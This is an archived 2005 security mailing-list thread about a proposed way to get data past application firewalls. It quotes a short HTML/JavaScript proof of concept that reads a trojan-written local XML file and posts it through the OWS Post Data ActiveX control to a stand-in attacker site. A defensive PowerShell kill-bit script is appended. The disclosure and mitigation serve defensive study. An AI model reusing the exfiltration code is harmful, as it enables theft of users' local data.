[WEB SECURITY] RE: [Full-disclosure] new attack technique? using JavaScript+XML+OWSPost Data

Gaurav Kumar gaurav at securebox.org
Wed Dec 21 22:21:59 EST 2005

On 12/22/05, Debasis Mohanty <mail at hackingspirits.com> wrote:
> -----Original Message-----
> From: Gaurav Kumar
> Sent: Wednesday, December 21, 2005 8:59 PM
> To: full-disclosure at lists.grok.org.uk
> Cc: websecurity at webappsec.org
> Subject: [Full-disclosure] new attack technique? using
> JavaScript+XML+OWSPost Data
> 1>> A Trojan has to be placed on a system running an
> 1>> application firewall like Zone Alarm Pro etc.
> >> Assumptions:
> 2>> The target system must have Office XP and the user has
> 2>> to be lured to view a webpage hosted by the attacker.
> 3>> The Trojan can be designed to generate an xml
> 3>> file which will contain the data to be sent out. The attacker will lure
> 3>> the user to visit a website hosted by him.
> Lol !! In a practical scenario, the attacker who spreads the worm/trojans
> himself is not aware in the initial stage which are the infected machines
> unless the trojan sends the machine/user info back to the attacker. Now,
> as you have already mentioned ZA is running, no data can be sent back to
> the attacker. So the attacker is clueless which are those infected machines.

Looks like you need to read again what I wrote. I didn't use the word
'spread'. Moreover, you need not know if the target system is running ZA
or not...the technique works even if a firewall
is not installed. I am discussing a possible 'design' of a trojan
here; it doesn't matter if ZA or any other FW is running on the client.

> So the case of luring the user to visit the link is out of scope...

Really? Ever heard of IE exploits?

> >> The site can have following HTML code-
> Now coming back to technical stuff, you are trying to access a local file,
> which will only be allowed if the site is in "Trusted Sites" or "Local
> Intranet" or "Local Security Zone" and the ActiveX is not marked safe. The fact
> that *the client is also the server* is irrelevant.
> Try uploading the script to some webserver and give it an html extension; it
> will throw an _access denied_ error when the page loads (even on Win XP +
> SP1).
> In case of any server side extension like *.asp, *.jsp etc., the user will be
> prompted that a malicious component is trying to load and asked for
> permission.
> >> <html>
> >> <body>
> >> The author is not responsible for any misuse,
> >> this PoC is for educational purpose only.
> >> <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
> >> id="exp">
> >> </object>
> >> <script LANGUAGE=javascript>
> >> var xmlDoc
> >> xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
> >> xmlDoc.async=false;
> >> xmlDoc.load("c:\\note.xml");
> >> xmlObj=xmlDoc.documentElement;
> >> var a= xmlObj.firstChild.text;
> >> exp.Post(0,"http://www.attackersite.com/input.asp",a);
> >> </script>
> >> </body>
> >> </html>
> >> The above code (works well on Windows XP SP2) essentially calls the
> >> "OWS Post Data" COM control to post the contents of note.xml
> >> (generated by the trojan) to attackersite.com
> IMHO, never conduct such tests in an "Intranet Zone" or "Local Zone" and draw
> conclusions about the "Internet Security Zone".
> You may also refer to this link to know about this issue -
> http://support.microsoft.com/kb/317244/EN-US/
> >>> Essentially, the technique is breaking the basic
> >>> functionality of application firewalls by using OWS Post Data
> >>> as bridge for sending out the data using Javascript and XML.
> Not exactly !! I would rather suggest you do a little more research before
> drawing any conclusion. Keep those _Security Zones_ in mind before you post
> anything...

Well..exactly! I would suggest you read the 'assumptions' first; it's an
assumption that the user will click yes to the warning...like most 'normal'
users do.
> - D
> ---------------------------------------------------------------------
> The Web Security Mailing List
> http://www.webappsec.org/lists/websecurity/
> The Web Security Mailing List Archives
> http://www.webappsec.org/lists/websecurity/archive/
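The practical defence against the design discussed in this thread, whatever the security zone, is to stop Internet Explorer from instantiating the control at all by setting its ActiveX "kill bit". The following PowerShell is an added example written for this archive page, not code from either poster; it uses the CLSID quoted in the PoC and Microsoft's documented "Compatibility Flags" kill-bit mechanism, and assumes an elevated shell on a 64-bit host (the Wow6432Node path is unnecessary on 32-bit Windows).

```powershell
# Added example (not from the thread): set and verify the ActiveX kill bit for
# the OWS Post Data control, so IE refuses to create it in every security zone.
# Assumption: run from an elevated PowerShell on 64-bit Windows.
$Clsid   = '{BDEADE98-C265-11D0-BCED-00A0C90AB50F}'   # CLSID quoted in the PoC above
$KillBit = 0x400                                       # "Compatibility Flags" bit that blocks instantiation
$Paths = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
)

function Set-ActiveXKillBit {
    param([string[]]$RegPaths, [int]$Bit)
    foreach ($p in $RegPaths) {
        if (-not (Test-Path $p)) { New-Item -Path $p -Force | Out-Null }
        $current = (Get-ItemProperty -Path $p -Name 'Compatibility Flags' `
                    -ErrorAction SilentlyContinue).'Compatibility Flags'
        if ($null -eq $current) { $current = 0 }
        # OR the kill bit into any flags already present instead of overwriting them
        New-ItemProperty -Path $p -Name 'Compatibility Flags' -PropertyType DWord `
                         -Value ($current -bor $Bit) -Force | Out-Null
    }
}

function Test-ActiveXKillBit {
    param([string[]]$RegPaths, [int]$Bit)
    # Returns one row per registry view so an admin can confirm both 32- and 64-bit IE are covered
    foreach ($p in $RegPaths) {
        $flags = (Get-ItemProperty -Path $p -Name 'Compatibility Flags' `
                  -ErrorAction SilentlyContinue).'Compatibility Flags'
        [pscustomobject]@{ Path = $p; KillBitSet = (($flags -band $Bit) -eq $Bit) }
    }
}

Set-ActiveXKillBit  -RegPaths $Paths -Bit $KillBit
Test-ActiveXKillBit -RegPaths $Paths -Bit $KillBit | Format-Table -AutoSize
```

Setting the kill bit blocks the control even for pages in the Trusted Sites or Local Intranet zones, which is the scenario the reply above relies on the user having to click through.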
